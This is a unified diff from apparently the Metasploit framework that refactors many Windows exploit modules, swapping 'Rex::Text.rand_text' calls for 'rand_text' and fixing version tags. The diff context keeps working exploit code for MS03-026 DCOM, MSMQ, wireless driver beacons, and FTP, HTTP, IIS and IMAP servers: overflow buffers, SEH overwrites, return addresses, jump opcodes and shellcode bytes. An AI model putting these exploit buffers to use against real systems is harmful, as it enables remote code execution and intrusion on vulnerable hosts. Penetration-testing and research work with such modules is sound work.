sploit = Rex::Text.rand_text_alpha_upper(498) + [ target.ret ].pack('V')
|
||||
sploit = rand_text_alpha_upper(498) + [ target.ret ].pack('V')
|
||||
sploit << make_nops(40) + payload.encoded
|
||||
|
||||
# Build the stream format
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -95,7 +95,7 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
|
|||
print_status("Bound to #{handle} ...")
|
||||
|
||||
# Carefully create the combination of addresses and code for cross-os exploitation
|
||||
xpseh = Rex::Text.rand_text_alphanumeric(360, payload_badchars)
|
||||
xpseh = rand_text_alphanumeric(360, payload_badchars)
|
||||
|
||||
# Jump to [esp-4] - (distance to shellcode)
|
||||
jmpsc =
|
||||
|
|
@ -137,7 +137,7 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
|
|||
#
|
||||
|
||||
nt4sp3jmp = Rex::Arch::X86.jmp_short("$+#{12 + 5}") +
|
||||
Rex::Text.rand_text(2, payload_badchars)
|
||||
rand_text(2, payload_badchars)
|
||||
|
||||
nt4sp5jmpback = "\xe9" + [ ((5 + 4 + payload.encoded.length) * -1) ].pack('V')
|
||||
nt4sp3jmpback = "\xe9" + [ ((12 + 5 + 5 + payload.encoded.length) * -1) ].pack('V')
|
||||
|
|
@ -149,7 +149,7 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
|
|||
nt4sp3jmpback
|
||||
|
||||
# Pad to the magic value of 118 bytes
|
||||
ntshiz += Rex::Text.rand_text(118 - ntshiz.length, payload_badchars)
|
||||
ntshiz += rand_text(118 - ntshiz.length, payload_badchars)
|
||||
|
||||
# Create the evil UNC path used in the overflow
|
||||
uncpath =
|
||||
|
|
@ -165,13 +165,13 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
|
|||
[ target['Rets'][1] ].pack('V') + # Writable address on 2000 and jmp for NT 4.0
|
||||
make_nops(88) +
|
||||
Rex::Arch::X86.jmp_short(4) +
|
||||
Rex::Text.rand_text(4, payload_badchars) +
|
||||
rand_text(4, payload_badchars) +
|
||||
make_nops(8) +
|
||||
Rex::Arch::X86.jmp_short(4) +
|
||||
Rex::Arch::X86.jmp_short(4) +
|
||||
make_nops(4) +
|
||||
Rex::Arch::X86.jmp_short(4) +
|
||||
Rex::Text.rand_text(4, payload_badchars) +
|
||||
rand_text(4, payload_badchars) +
|
||||
payload.encoded +
|
||||
ntshiz +
|
||||
xpseh +
|
||||
|
|
@ -184,7 +184,7 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
|
|||
NDR.long(0) +
|
||||
NDR.long(0) +
|
||||
|
||||
Rex::Text.rand_text(16) +
|
||||
rand_text(16) +
|
||||
|
||||
NDR.long(0) +
|
||||
NDR.long(0) +
|
||||
|
|
|
|||
|
|
@ -103,7 +103,7 @@ class Exploits::Windows::Dcerpc::MS05_017_MSMQ < Msf::Exploit::Remote
|
|||
queue_hlen = datastore['HNAME'].length * 2
|
||||
queue_path = unicode(queue_name + "\\PRIVATE$\\")
|
||||
|
||||
buf = Rex::Text.rand_text_english(4000, payload_badchars)
|
||||
buf = rand_text_english(4000, payload_badchars)
|
||||
|
||||
# Windows 2000 SEH offset goes first
|
||||
buf[332 + queue_hlen + 0, 4] = [ target['Rets'][0] ].pack('V')
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -175,7 +175,7 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
|
|||
#
|
||||
|
||||
# timestamp value
|
||||
Rex::Text.rand_text_alphanumeric(8) +
|
||||
rand_text_alphanumeric(8) +
|
||||
"\x64\x00" + # beacon interval
|
||||
"\x11\x04" + # capability flags
|
||||
|
||||
|
|
@ -193,7 +193,7 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
|
|||
"\xff\xe1" + # jmp ecx
|
||||
|
||||
# padding
|
||||
Rex::Text.rand_text_alphanumeric(79) +
|
||||
rand_text_alphanumeric(79) +
|
||||
|
||||
# return address
|
||||
[target.ret].pack('V') +
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -164,12 +164,12 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
|
|||
|
||||
def create_beacon
|
||||
|
||||
ssid = Rex::Text.rand_text_alphanumeric(6)
|
||||
bssid = ("\x00" * 2) + Rex::Text.rand_text(4)
|
||||
ssid = rand_text_alphanumeric(6)
|
||||
bssid = ("\x00" * 2) + rand_text(4)
|
||||
src = ("\x90" * 4) + "\xeb\x2b"
|
||||
seq = [rand(255)].pack('n')
|
||||
|
||||
buff = Rex::Text.rand_text(75)
|
||||
buff = rand_text(75)
|
||||
buff[0, 2] = "\xeb\x49"
|
||||
buff[71, 4] = [target.ret].pack('V')
|
||||
|
||||
|
|
@ -181,7 +181,7 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
|
|||
src + # src
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
Rex::Text.rand_text(8) + # timestamp value
|
||||
rand_text(8) + # timestamp value
|
||||
"\x64\x00" + # beacon interval
|
||||
"\x00\x05" + # capability flags
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -167,11 +167,11 @@ class Exploits::Windows::Driver::Netgear_WiFi_Beacon < Msf::Exploit::Remote
|
|||
|
||||
def create_beacon
|
||||
|
||||
ssid = Rex::Text.rand_text_alphanumeric(16)
|
||||
bssid = ("\x00" * 2) + Rex::Text.rand_text(4)
|
||||
src = ("\x00" * 2) + Rex::Text.rand_text(4)
|
||||
ssid = rand_text_alphanumeric(16)
|
||||
bssid = ("\x00" * 2) + rand_text(4)
|
||||
src = ("\x00" * 2) + rand_text(4)
|
||||
seq = [rand(255)].pack('n')
|
||||
stamp = Rex::Text.rand_text(8)
|
||||
stamp = rand_text(8)
|
||||
|
||||
frame =
|
||||
"\x80" + # type/subtype
|
||||
|
|
@ -183,7 +183,7 @@ class Exploits::Windows::Driver::Netgear_WiFi_Beacon < Msf::Exploit::Remote
|
|||
seq + # seq
|
||||
stamp + # timestamp value
|
||||
"\x64\x00" + # beacon interval
|
||||
Rex::Text.rand_text(2) + # capability flags
|
||||
rand_text(2) + # capability flags
|
||||
|
||||
# ssid tag
|
||||
"\x00" + ssid.length.chr + ssid +
|
||||
|
|
@ -202,7 +202,7 @@ class Exploits::Windows::Driver::Netgear_WiFi_Beacon < Msf::Exploit::Remote
|
|||
"\xff\xe7" # jmp edi
|
||||
|
||||
# Overwrite enough to pop the return
|
||||
buf = Rex::Text.rand_text(1160)
|
||||
buf = rand_text(1160)
|
||||
|
||||
# Kernel-mode stager fun goes here
|
||||
buf[0, payload.encoded.length] = payload.encoded
|
||||
|
|
@ -214,7 +214,7 @@ class Exploits::Windows::Driver::Netgear_WiFi_Beacon < Msf::Exploit::Remote
|
|||
buf[1113, jumper.length] = jumper
|
||||
|
||||
# Pad it out to be a valid set of IEs
|
||||
frame << ie_padding(buf) {|c| Rex::Text.rand_text(c) }
|
||||
frame << ie_padding(buf) {|c| rand_text(c) }
|
||||
|
||||
return frame
|
||||
end
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -94,7 +94,7 @@ class Exploits::Windows::Ftp::ThreeCeeDaemonFTPUserOverflow < Msf::Exploit::Remo
|
|||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
buf = Rex::Text.rand_text_english(2048, payload_badchars)
|
||||
buf = rand_text_english(2048, payload_badchars)
|
||||
seh = generate_seh_payload(target.ret)
|
||||
buf[229, seh.length] = seh
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -68,7 +68,7 @@ class Exploits::Windows::Ftp::Cesarftp_Mkd < Msf::Exploit::Remote
|
|||
def exploit
|
||||
connect_login
|
||||
|
||||
sploit = "\n" * 671 + Rex::Text.rand_text_english(3, payload_badchars)
|
||||
sploit = "\n" * 671 + rand_text_english(3, payload_badchars)
|
||||
sploit << [target.ret].pack('V') + make_nops(40) + payload.encoded
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -70,8 +70,8 @@ class Exploits::Windows::Ftp::Freeftpd_key_exchange < Msf::Exploit::Remote
|
|||
sploit = "SSH-2.0-OpenSSH_3.9p1"
|
||||
sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
|
||||
sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
|
||||
sploit << Rex::Text.rand_text_alphanumeric(1055) + [target.ret].pack('V')
|
||||
sploit << payload.encoded + Rex::Text.rand_text_alphanumeric(19000) + "\r\n"
|
||||
sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V')
|
||||
sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n"
|
||||
|
||||
res = sock.recv(40)
|
||||
if ( res =~ /SSH-2\.0-WeOnlyDo-wodFTPD 2\.1\.8\.98/)
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -92,7 +92,7 @@ class Exploits::Windows::Ftp::FreeFTPDUserOverflow < Msf::Exploit::Remote
|
|||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
buf = Rex::Text.rand_text_english(1816, payload_badchars)
|
||||
buf = rand_text_english(1816, payload_badchars)
|
||||
seh = generate_seh_payload(target.ret)
|
||||
buf[1008, seh.length] = seh
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -107,7 +107,7 @@ class Exploits::Windows::Ftp::NetTermNetFTPOverflow < Msf::Exploit::Remote
|
|||
# R push edx
|
||||
# \x20\xC0 and al, al
|
||||
|
||||
buf = Rex::Text.rand_text_english(8192, payload_badchars)
|
||||
buf = rand_text_english(8192, payload_badchars)
|
||||
buf[0, 1] = "\xc0"
|
||||
buf[1, payload.encoded.length] = payload.encoded
|
||||
buf[1014, 4] = [ target.ret ].pack('V')
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -80,8 +80,8 @@ class Exploits::Windows::Ftp::Oracle9iXDPPassOverflow < Msf::Exploit::Remote
|
|||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
usr = Rex::Text.rand_text_english(rand(8)+1, payload_badchars)
|
||||
buf = Rex::Text.rand_text_english(1292, payload_badchars)
|
||||
usr = rand_text_english(rand(8)+1, payload_badchars)
|
||||
buf = rand_text_english(1292, payload_badchars)
|
||||
seh = generate_seh_payload(target.ret)
|
||||
buf[442, seh.length] = seh
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -81,7 +81,7 @@ class Exploits::Windows::Ftp::Oracle9iXDBUnlockOverflow < Msf::Exploit::Remote
|
|||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
buf = Rex::Text.rand_text_english(1130, payload_badchars)
|
||||
buf = rand_text_english(1130, payload_badchars)
|
||||
seh = generate_seh_payload(target.ret)
|
||||
buf[322, seh.length] = seh
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -74,7 +74,7 @@ class Exploits::Windows::Ftp::WSFTPDMKDOverflow < Msf::Exploit::Remote
|
|||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
buf = Rex::Text.rand_text_alphanumeric(8192)
|
||||
buf = rand_text_alphanumeric(8192)
|
||||
buf[498, 4] = [ 0x7ffd3001 ].pack('V')
|
||||
buf[514, 4] = [ target.ret ].pack('V')
|
||||
buf[518, 4] = [ target.ret ].pack('V')
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -67,7 +67,7 @@ class Exploits::Windows::Ftp::Wsftp_Server_505_Xmd5 < Msf::Exploit::Remote
|
|||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
sploit = Rex::Text.rand_text_alphanumeric(676, payload_badchars)
|
||||
sploit = rand_text_alphanumeric(676, payload_badchars)
|
||||
sploit << [target.ret].pack('V') + payload.encoded
|
||||
|
||||
send_cmd( ['XMD5', sploit] , false)
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -89,7 +89,7 @@ class Exploits::Windows::Http::ALTN_WebAdmin_Overflow < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
|
||||
user_cook = Rex::Text.rand_text_alphanumeric(2)
|
||||
user_cook = rand_text_alphanumeric(2)
|
||||
post_data = 'User=' + make_nops(168) + [target.ret].pack('V') + payload.encoded
|
||||
post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -65,8 +65,8 @@ class Exploits::Windows::Http::Edirectory_Host < Msf::Exploit::Remote
|
|||
connect
|
||||
|
||||
sploit = "GET /nds HTTP/1.1" + "\r\n"
|
||||
sploit << "Host: " + Rex::Text.rand_text_alphanumeric(9, payload_badchars)
|
||||
sploit << "," + Rex::Text.rand_text_alphanumeric(719, payload_badchars)
|
||||
sploit << "Host: " + rand_text_alphanumeric(9, payload_badchars)
|
||||
sploit << "," + rand_text_alphanumeric(719, payload_badchars)
|
||||
seh = generate_seh_payload(target.ret)
|
||||
sploit[705, seh.length] = seh
|
||||
sploit << "\r\n\r\n"
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -68,7 +68,7 @@ class Exploits::Windows::Http::Ipswitch_Wug_Maincfgret < Msf::Exploit::Remote
|
|||
user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}"
|
||||
|
||||
req << "page=notify&origname=&action=return&type=Beeper&instancename="
|
||||
req << Rex::Text.rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06"
|
||||
req << rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06"
|
||||
req << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded
|
||||
req << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -66,12 +66,12 @@ class Exploits::Windows::Http::Maxdb_Webdbm_Dbname_Overflow < Msf::Exploit::Remo
|
|||
def exploit
|
||||
connect
|
||||
|
||||
server = Rex::Text.rand_text_english(5, payload_badchars)
|
||||
user = Rex::Text.rand_text_english(5, payload_badchars)
|
||||
pass = Rex::Text.rand_text_english(5, payload_badchars)
|
||||
server = rand_text_english(5, payload_badchars)
|
||||
user = rand_text_english(5, payload_badchars)
|
||||
pass = rand_text_english(5, payload_badchars)
|
||||
port = rand(65535).to_s
|
||||
|
||||
sploit = Rex::Text.rand_text_alphanumeric(91, payload_badchars) + [target.ret].pack('V')
|
||||
sploit = rand_text_alphanumeric(91, payload_badchars) + [target.ret].pack('V')
|
||||
sploit << payload.encoded
|
||||
|
||||
req = "Event=DBM_LOGON&Action=LOGON&Server=#{server}&Database=#{sploit}"
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -74,7 +74,7 @@ class Exploits::Windows::Http::MaxDB_WebDBM_GET_Overflow < Msf::Exploit::Remote
|
|||
# Trigger the SEH by writing past the end of the page after
|
||||
# the SEH is already overwritten. This avoids the other smashed
|
||||
# pointer exceptions and goes straight to the payload.
|
||||
buf = Rex::Text.rand_text_alphanumeric(16384)
|
||||
buf = rand_text_alphanumeric(16384)
|
||||
buf[1586, payload.encoded.length] = payload.encoded
|
||||
buf[3638, 5] = "\xe9" + [-2052].pack('V')
|
||||
buf[3643, 2] = "\xeb\xf9"
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -67,7 +67,7 @@ class Exploits::Windows::Http::Minishare_GET_Overflow < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
uri = Rex::Text.rand_text_alphanumeric(target['Rets'][0])
|
||||
uri = rand_text_alphanumeric(target['Rets'][0])
|
||||
uri << [target['Rets'][1]].pack('V')
|
||||
uri << payload.encoded
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -72,7 +72,7 @@ class Exploits::Windows::Http::Navicopa_Get_Overflow < Msf::Exploit::Remote
|
|||
def exploit
|
||||
connect
|
||||
|
||||
sploit = Rex::Text.rand_text_alphanumeric(228, payload_badchars)
|
||||
sploit = rand_text_alphanumeric(228, payload_badchars)
|
||||
sploit << [target.ret].pack('V') + payload.encoded
|
||||
|
||||
uri = '/' + sploit
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -59,7 +59,7 @@ class Exploits::Windows::Http::NovellMessengerAcceptLanguage < Msf::Exploit::Rem
|
|||
def exploit
|
||||
connect
|
||||
|
||||
lang = Rex::Text.rand_text_alphanumeric(1900)
|
||||
lang = rand_text_alphanumeric(1900)
|
||||
lang[ 16, 4] = [target['Rets'][1]].pack('V') # SRC
|
||||
lang[272, 4] = [target['Rets'][1]].pack('V') # DST
|
||||
lang[264, 4] = [target['Rets'][0]].pack('V') # JMP ESP
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -77,8 +77,8 @@ class Exploits::Windows::Http::Oracle9i_Xdb_Pass < Msf::Exploit::Remote
|
|||
def exploit
|
||||
connect
|
||||
|
||||
sploit = Rex::Text.rand_text_english(4, payload_badchars) + ":"
|
||||
sploit << Rex::Text.rand_text_english(442, payload_badchars)
|
||||
sploit = rand_text_english(4, payload_badchars) + ":"
|
||||
sploit << rand_text_english(442, payload_badchars)
|
||||
sploit << "\xeb\x64" + make_nops(2) + [target.ret].pack('V')
|
||||
sploit << make_nops(266) + "\xeb\x10" + make_nops(109) + payload.encoded
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -60,7 +60,7 @@ class Exploits::Windows::Http::PeerCast_URL < Msf::Exploit::Remote
|
|||
def exploit
|
||||
connect
|
||||
|
||||
pat = Rex::Text.rand_text_alphanumeric(1024)
|
||||
pat = rand_text_alphanumeric(1024)
|
||||
pat[768, 4] = [target.ret].pack('V')
|
||||
pat[812, 5] = [0xe9, -517].pack('CV')
|
||||
pat[300, payload.encoded.length] = payload.encoded
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -95,7 +95,7 @@ class Exploits::Windows::Http::Shoutcast_Format < Msf::Exploit::Remote
|
|||
|
||||
num = 1046 - payload.encoded.length
|
||||
uri = '/content/%#0' + num.to_s + 'x' + payload.encoded
|
||||
uri << "\xeb\x06" + Rex::Text.rand_text_alphanumeric(2)
|
||||
uri << "\xeb\x06" + rand_text_alphanumeric(2)
|
||||
uri << [target.ret].pack('V')
|
||||
uri << "\xe9\x2d\xff\xff\xff"
|
||||
uri << '#0100x.mp3'
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -65,7 +65,7 @@ include Exploit::Remote::Tcp
|
|||
def exploit
|
||||
connect
|
||||
|
||||
pat = Rex::Text.rand_text_alphanumeric(4000)
|
||||
pat = rand_text_alphanumeric(4000)
|
||||
pat[8,4] = [target.ret].pack('V')
|
||||
pat[103, payload.encoded.length] = payload.encoded
|
||||
pat = Rex::Text.uri_encode(pat)
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -70,7 +70,7 @@ class Exploits::Windows::Http::Sybase_Easerver < Msf::Exploit::Remote
|
|||
print_status( "Attempting to exploit...")
|
||||
|
||||
# Building the evil buffer
|
||||
crash = Rex::Text.rand_text_alphanumeric(5000, payload_badchars)
|
||||
crash = rand_text_alphanumeric(5000, payload_badchars)
|
||||
crash[ target['Offset'] - 4, 2 ] = "\xeb\x06"
|
||||
crash[ target['Offset'] , 4 ] = [target.ret].pack('V')
|
||||
crash[ target['Offset'] + 4, payload.encoded.length ] = payload.encoded
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -95,7 +95,7 @@ class Exploits::Windows::Http::TrackerCam_PHPArg_Overflow < Msf::Exploit::Remote
|
|||
def exploit
|
||||
c = connect
|
||||
|
||||
buf = Rex::Text.rand_text_english(8192)
|
||||
buf = rand_text_english(8192)
|
||||
seh = generate_seh_payload(target.ret)
|
||||
buf[257, seh.length] = seh
|
||||
|
||||
|
|
@ -124,7 +124,7 @@ class Exploits::Windows::Http::TrackerCam_PHPArg_Overflow < Msf::Exploit::Remote
|
|||
|
||||
def fingerprint
|
||||
|
||||
res = download(Rex::Text.rand_text_alphanumeric(12) + '.txt') || return
|
||||
res = download(rand_text_alphanumeric(12) + '.txt') || return
|
||||
|
||||
m = res.match(/in <b>(.*)<\/b> on line/smi)
|
||||
return if not m
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -84,10 +84,10 @@ class Exploits::Windows::Iis::MS01_033_IDQ < Msf::Exploit::Remote
|
|||
def exploit
|
||||
connect
|
||||
|
||||
sploit = Rex::Text.rand_text_alphanumeric(1) + ".idq?" + Rex::Text.rand_text_alphanumeric(232, payload_badchars)
|
||||
sploit = rand_text_alphanumeric(1) + ".idq?" + rand_text_alphanumeric(232, payload_badchars)
|
||||
sploit << "%u06eb.%u" + target.ret[-4, 4] + "%u" + target.ret[-8, 4]
|
||||
sploit << ".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF=" + Rex::Text.rand_text_alphanumeric(1)
|
||||
sploit << " HTTP/1.0\r\n" + make_nops(10) + Rex::Text.rand_text_alphanumeric(36, payload_badchars)
|
||||
sploit << ".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF=" + rand_text_alphanumeric(1)
|
||||
sploit << " HTTP/1.0\r\n" + make_nops(10) + rand_text_alphanumeric(36, payload_badchars)
|
||||
|
||||
uri = '/' + sploit + payload.encoded
|
||||
|
||||
|
|
|
|||
|
|
@ -134,7 +134,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
|
|||
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
|
||||
|
||||
if datastore['invalid_search_request'] == true
|
||||
xml = Rex::Text.rand_text(rand(1024) + 32)
|
||||
xml = rand_text(rand(1024) + 32)
|
||||
end
|
||||
|
||||
# The nop generator can be cpu-intensive for large buffers, so we use a static sled of 'A'
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -73,9 +73,9 @@ class Exploits::Windows::Imap::Eudora_List < Msf::Exploit::Remote
|
|||
jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"
|
||||
jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"
|
||||
|
||||
sploit = "a001 LIST " + Rex::Text.rand_text_alpha_upper(20, payload_badchars)
|
||||
sploit = "a001 LIST " + rand_text_alpha_upper(20, payload_badchars)
|
||||
sploit << payload.encoded + "\xeb\x06" + make_nops(2) + [target.ret].pack('V')
|
||||
sploit << make_nops(8) + jmp + Rex::Text.rand_text_alpha_upper(40, payload_badchars)
|
||||
sploit << make_nops(8) + jmp + rand_text_alpha_upper(40, payload_badchars)
|
||||
sploit << "}" + "\r\n"
|
||||
|
||||
sock.put(sploit)
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -74,7 +74,7 @@ class Exploits::Windows::Imap::IMailIMAPDeleteOverflow < Msf::Exploit::Remote
|
|||
# Jump over code
|
||||
req << "\x74\x32\x75\x30"
|
||||
req << [target.ret].pack('V')
|
||||
req << Rex::Text.rand_text_alphanumeric(44)
|
||||
req << rand_text_alphanumeric(44)
|
||||
|
||||
# GetEIP code
|
||||
req << "\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x5a\x6a\x31\x59"
|
||||
|
|
@ -87,7 +87,7 @@ class Exploits::Windows::Imap::IMailIMAPDeleteOverflow < Msf::Exploit::Remote
|
|||
req << "\x70\x55\x50\x4b\x4f\x6b\x52\x6a"
|
||||
|
||||
# Run off the stack, so we don't kill our payload, or something...
|
||||
req << Rex::Text.rand_text_alphanumeric(600)
|
||||
req << rand_text_alphanumeric(600)
|
||||
|
||||
# Terminate the request
|
||||
req << "\r\n"
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -59,8 +59,8 @@ class Exploits::Windows::Imap::MailEnableImapLoginOverflow < Msf::Exploit::Remot
|
|||
def exploit
|
||||
connect
|
||||
|
||||
auth = "a001 LOGIN " + Rex::Text.rand_text_alpha_upper(4) + " {10}\r\n"
|
||||
sploit = Rex::Text.rand_text_alpha_upper(556) + [target.ret].pack('V')
|
||||
auth = "a001 LOGIN " + rand_text_alpha_upper(4) + " {10}\r\n"
|
||||
sploit = rand_text_alpha_upper(556) + [target.ret].pack('V')
|
||||
sploit << payload.encoded + "\r\n\r\n"
|
||||
|
||||
res = sock.recv(50)
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -66,7 +66,7 @@ class Exploits::Windows::Imap::MailEnableImapStatusOverflow < Msf::Exploit::Remo
|
|||
connect_login
|
||||
|
||||
seh = generate_seh_payload(target['Rets'][1])
|
||||
buf = Rex::Text.rand_text_alphanumeric(target['Rets'][0])
|
||||
buf = rand_text_alphanumeric(target['Rets'][0])
|
||||
req = "a001 STATUS \".\x00" + buf + seh
|
||||
req << "\" (UIDNEXT UIDVALIDITY MESSAGES UNSEEN RECENT)\r\n"
|
||||
sock.put(req)
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -72,7 +72,7 @@ class Exploits::Windows::Imap::MailEnableImapW3CLoggingSelectOverflow < Msf::Exp
|
|||
def exploit
|
||||
connect_login
|
||||
|
||||
